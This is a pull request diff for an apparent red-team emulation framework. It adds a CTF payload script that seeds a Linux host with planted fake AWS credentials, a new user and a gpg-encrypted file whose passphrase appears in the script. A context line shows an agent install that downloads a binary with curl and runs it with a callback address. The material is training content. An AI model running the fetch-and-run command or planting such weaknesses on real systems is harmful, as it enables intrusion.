### PR TITLE
adding a new payload, to use in our ctf challenges

### DIFF
--- a/payloads/config.yml
+++ b/payloads/config.yml
@@ -59,3 +59,11 @@ schism:
     schism.py:
       install: |
         curl PAYLOAD.URL > /tmp/schism && chmod +x /tmp/schism && pip install ftplib && nohup /tmp/schism -address #{callback} &
+
+ctf:
+  metadata:
+    description: Create a vulnerable environment to practice against
+    platforms: 
+      - linux
+  payloads:
+    vulnerable.sh: {}

--- a/payloads/ctf/vulnerable.sh
+++ b/payloads/ctf/vulnerable.sh
@@ -1,0 +1,4 @@
+#!/bin/bash
+sudo groupadd bunny && sudo usermod -aG bunny ec2-user;
+sudo echo "console.aws.amazon.com, iamroot, th3mar3th3appl3s" >> /var/local/sample.csv;
+sudo useradd privateducky && sudo mkdir /home/privateducky/.contacts && sudo echo "d2lsbCBzbWl0aA==: 555-555-5555" >> /home/privateducky/.contacts/phone.txt && sudo echo "nobigdeal:)" | gpg -c --batch --yes --passphrase-fd 0 /home/privateducky/.contacts/phone.txt && sudo rm /home/privateducky/.contacts/phone.txt;


### PR DESCRIPTION
Adding a new payload, and metadata, to represent the CTF "tools" being used in 1.1 today.

This payload would be selected when deploying a server from the Cloud plugin, to set up a vulnerable environment for testing.